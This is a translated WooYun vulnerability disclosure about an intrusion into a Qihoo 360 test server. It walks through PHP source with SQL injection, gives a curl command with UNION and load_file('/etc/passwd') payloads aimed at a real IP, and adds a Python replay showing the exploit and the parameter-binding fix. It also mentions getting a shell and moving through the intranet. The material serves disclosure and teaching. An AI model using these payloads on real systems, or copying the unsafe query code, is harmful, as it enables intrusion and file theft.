Vulnerability summary

Defect ID: wooyun-2015-0122949

Title: Just a nifty tool: GETSHELL on a Qihoo 360 site, then intranet roaming all the way to webscan

Related vendor: 奇虎360 (Qihoo 360)

Author: 举起手来

Submitted: 2015-06-26 16:47

Fixed: 2015-08-10 18:10

Published: 2015-08-10 18:10

Vulnerability type: Successful intrusion event

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-06-26: Details sent to the vendor, awaiting vendor handling
2015-06-26: Vendor confirmed; details disclosed to the vendor only
2015-07-06: Details disclosed to core white hats and relevant domain experts
2015-07-16: Details disclosed to regular white hats
2015-07-26: Details disclosed to intern white hats
2015-08-10: Details disclosed to the public

Brief description:

Caused by one small issue. Skipping dinner this time; I'll eat after I'm done roaming. Damn it!

Detailed description:

First, there is this problem:
http://220.181.150.107/web.tgz
Obviously the site's source code. I downloaded it for an audit; my guess was injection:
➜ web cat web_function.php

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../db/db_function.php");
function verifyed($short_code, $token)
{
$state = NULL;
$pdo = connect2db();
if($pdo == NULL )
return 1;
// $token (POST mobile) and $short_code (POST code) are dropped into the query via sprintf('%s') without any escaping: SQL injection
$sql = sprintf("select * from receiver_reference_count where rev_jid='%s' and short_code='%s'", $token, $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$state = $row['state'];
}
//echo " state: ".$state;
if($state === NULL || $state === '' )
return 3;
else if($state == '0')
return 4; // a state of '0' sends get.php to the ad page, which runs a second query on $short_code
return 0;
}
function get_nickname_by_short_code($short_code)
{
$jid = NULL;
$data = NULL;
$nickname = '';
$pdo = connect2db();
if($pdo == NULL )
return 1;
// same pattern: $short_code is interpolated unescaped
$sql = sprintf("select jid from short_hash_jid where short_hash = '%s'", $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$jid = $row['jid'];
}
//echo " state: ".$state;
if($jid === NULL || $jid === '' )
return 3;
$result = '';
// the jid just read back from the database is interpolated again (second-order injection surface)
$sql = sprintf("select name from ofUser where username='%s'", $jid);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 4;
foreach($result as $row)
{
$nickname = $row['name'];
}
//echo "name: ".$nickname.PHP_EOL;
$data = array('jid'=>$jid, 'nickname'=>$nickname);
return $data;
}
function get_play_time_by_short_code( $short_code )
{
$time = 5;
$pdo = connect2db();
if($pdo == NULL )
return $time;
$sql = sprintf("select play_time from short_hash_jid where short_hash='%s'", $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return $time;
foreach($result as $row)
{
$time = $row['play_time'];
//echo "time:".$time.PHP_EOL;
}
if($time === NULL || $time === '' || $time === '0')
$time = 5;
return $time;
}
//echo verifyed('bXhRdzQWj1JYDmos',"13438299142" );
/*
$data = get_nickname_by_short_code("1dhg05myYabJI5CO");
if( !is_int($data))
{
print_r($data);
}else{
echo $data.PHP_EOL;
}*/
//echo get_play_time_by_short_code("QgHUkVoFE7mhSD9P");
?>


Obviously injection, but let's follow the logic; the entry point is get.php:

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../libs/util.php");
require_once("gen_html.php");
require_once("web_function.php");
if (isset($_COOKIE["token"]))
{
$token = $_COOKIE["token"];
}
//print_r($_COOKIE);
$query_str = isset($_SERVER['QUERY_STRING']) ? getParams($_SERVER['QUERY_STRING']) : '';
//echo "query_str: ".$query_str."<br>";
parse_str($query_str, $tmpArr);
//print_r($tmpArr);
if(isset($tmpArr['s']))
{
$short_code = $tmpArr['s'];
}
//echo "short_code: ".$short_code."<br>";
//print_r($_POST);
//////////////////////////////////////////////////////////////
//for Jump the page
$mobile = $_POST['mobile']; // attacker-controlled
$post_code = $_POST['code']; // attacker-controlled
if ($mobile != '')
{
// echo "short_code=".$post_code."mobile=".$mobile;
$ret = verifyed($post_code, $mobile); // mobile lands in rev_jid='%s', code in short_code='%s'
// echo "ret == ".$ret;
if ($ret == 0)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_picture_html($post_code, $mobile, $dir);
exit();
}
if ($ret == 4)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_ad_html($dir, $post_code); // ret == 4: $post_code is queried again via get_nickname_by_short_code()
exit();
}
response_verify_html($post_code, $dir);
exit();
}
//////////////////////////////////////////////////////////////
//print_r($_COOKIE);
$ret = verifyed($short_code, $token);
if ($ret == 0 )
{
setcookie("token", $token, time()+3600, "/", null);
response_picture_html($short_code, $token, $dir);
exit();
}
if($ret == 4)
{
response_ad_html($dir, $short_code);
exit();
}
response_verify_html($short_code, $dir);
exit();
?>


Together with this file:

➜  web  cat gen_html.php 
<?php
$dir = dirname(__FILE__).'/';
require_once("../libs/SmartyTemplate.php");
require_once("../libs/util.php");
require_once("web_function.php");
function response_verify_html($code, $dir)
{
$tpl = 'template/verify.html.tpl';
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$objSmarty->assign('short_code',$code);
$url = "http://220.181.150.107/".$code.".htl";
$objSmarty->assign('thumb_src',$url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_picture_html($code, $token, $dir)
{
$tpl = 'template/picture.html.tpl';
$finish_url = "http://220.181.150.107/".$code;
$counter = get_play_time_by_short_code($code);
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$url = "http://220.181.150.107/".$code.".htl?jid=".$token."&type=normal";
$objSmarty->assign('img_url',$url);
$objSmarty->assign('counter',$counter);
$objSmarty->assign('finish_url',$finish_url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
//writeLog($file_tpl." why22222222222222", __FILE__, __LINE__, DOWNLOAD_RUN_LOG);
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_ad_html($dir, $short_code)
{
$tpl = 'template/ad.html.tpl';
$nickname = '';
$jid = '';

$data = get_nickname_by_short_code($short_code);
if( !is_int($data) )
{
$jid = $data['jid'];
$nickname = $data['nickname'];
//print_r($data);
}
$objSmarty = SmartyTemplate::getInstance();
//echo "nickname: ".$nickname." jid: ".$jid."<br>";
$file_tpl = $dir.$tpl;
$objSmarty->assign('nickname',$nickname);
$objSmarty->assign('jid',$jid); // whatever the jid query returned is rendered into the ad template
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
?>


Putting it together, we get this injection point. The mobile payload makes verifyed() return 4: its UNION adds a row whose third column (state) is 0, so get.php goes to response_ad_html(). The code payload then flows into get_nickname_by_short_code(), where a second UNION puts the output of load_file() into $jid, which the ad template renders back to the client:

curl http://220.181.150.107/web/get.php -d "mobile=13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;&code=1'  union select load_file('/etc/passwd') -- ;"
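The following Python script is an added example, not code from the original report or from the audited source: it replays the two-stage chain above with the exact mobile and code payloads from the curl command, against an in-memory SQLite stand-in for the MySQL database behind connect2db(). The table layouts and rows are constructed, and MySQL's load_file() is emulated with a Python function over a constructed fake filesystem (on the real server this only works if the DB user holds the FILE privilege, which is an assumption here). Calling the same functions with safe=True uses bound parameters in place of sprintf-style string building, which is the fix the PHP needed.

```python
"""
Added example (not part of the original report): offline replay of the
two-stage injection in get.php. SQLite replaces MySQL, sample rows are
constructed, and load_file() is emulated over a constructed fake filesystem.
"""
import sqlite3

# Constructed sample data for the three tables web_function.php queries.
SCHEMA = """
CREATE TABLE receiver_reference_count (rev_jid TEXT, short_code TEXT, state TEXT);
CREATE TABLE short_hash_jid (short_hash TEXT, jid TEXT, play_time TEXT);
CREATE TABLE ofUser (username TEXT, name TEXT);
INSERT INTO receiver_reference_count VALUES ('13800000000', 'bXhRdzQWj1JYDmos', '1');
INSERT INTO short_hash_jid VALUES ('bXhRdzQWj1JYDmos', 'alice@example', '5');
INSERT INTO ofUser VALUES ('alice@example', 'Alice');
"""

# Constructed stand-in for the server's filesystem (assumption: the real
# MySQL user had FILE, so load_file('/etc/passwd') returned the file).
FAKE_FS = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}

# The two payloads from the report's curl command, verbatim.
MOBILE_PAYLOAD = "13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;"
CODE_PAYLOAD = "1'  union select load_file('/etc/passwd') -- ;"


def connect2db():
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.executescript(SCHEMA)
    conn.create_function("load_file", 1, lambda path: FAKE_FS.get(path))
    return conn


def query(conn, sql, params, safe):
    """safe=True binds parameters (the fix); safe=False reproduces the
    sprintf('%s') string building from web_function.php."""
    if safe:
        return conn.execute(sql.replace("'%s'", "?"), params)
    return conn.execute(sql % params)


def verifyed(conn, short_code, token, safe=False):
    """Mirror of verifyed(): 0 = ok, 3 = no row, 4 = state is '0' (ad page)."""
    cur = query(conn, "select * from receiver_reference_count "
                "where rev_jid='%s' and short_code='%s'", (token, short_code), safe)
    state = None
    for row in cur:
        state = row["state"]
    if state is None or state == "":
        return 3
    if str(state) == "0":      # PDO/MySQL would hand back the string '0'
        return 4
    return 0


def get_nickname_by_short_code(conn, short_code, safe=False):
    """Mirror of get_nickname_by_short_code(): dict on success, int on failure."""
    cur = query(conn, "select jid from short_hash_jid where short_hash = '%s'",
                (short_code,), safe)
    jid = None
    for row in cur:
        jid = row["jid"]
    if jid is None or jid == "":
        return 3
    # the value read back from the database is interpolated again in the original
    cur = query(conn, "select name from ofUser where username='%s'", (jid,), safe)
    nickname = ""
    for row in cur:
        nickname = row["name"]
    return {"jid": jid, "nickname": nickname}


def handle_post(conn, mobile, code, safe=False):
    """Mirror of the POST branch of get.php: returns (template, template data)."""
    ret = verifyed(conn, code, mobile, safe)
    if ret == 0:
        return "picture", {"code": code, "token": mobile}
    if ret == 4:
        data = get_nickname_by_short_code(conn, code, safe)
        return "ad", data if isinstance(data, dict) else {}
    return "verify", {"code": code}


if __name__ == "__main__":
    page, data = handle_post(connect2db(), MOBILE_PAYLOAD, CODE_PAYLOAD)
    print(page, repr(data["jid"]))   # the file contents land in the ad template's jid
    page, data = handle_post(connect2db(), MOBILE_PAYLOAD, CODE_PAYLOAD, safe=True)
    print(page)                      # with bound parameters the payloads match nothing
```

With the vulnerable path the response is the ad template carrying the contents of /etc/passwd in `jid`; with bound parameters both payloads are just unmatched strings and the request falls through to the verify page. Note the third query: even with the first two fixed, a jid value stored in `short_hash_jid` would still be interpolated into the `ofUser` lookup in the original PHP, so the parameter binding has to cover every query, not only the ones that take request input directly.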


Next, use the SQL injection to write a file and get a shell.

(screenshot: hosts.png)


Intranet roaming: running into webscan.360.cn

(screenshot: 3689ED9B-89B5-419B-A184-3A83D7D6EA57.png)

(screenshot: A63F1E3E-74A9-4738-90FF-FF52557F8324.png)

Proof of vulnerability:

That's it; stopping here. The shell has been deleted.

Fix recommendation:

Not that it matters!

Copyright notice: when reposting, credit the source 举起手来@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-26 18:09

Vendor reply:

Thank you for the report. This was a test server scheduled to be taken offline soon; we have now taken it offline.

Latest status:

2015-06-26: Confirmed that the test file had a SQL injection vulnerability; after successful exploitation, some machines in the same IDC could be probed. Thanks again to the white hat!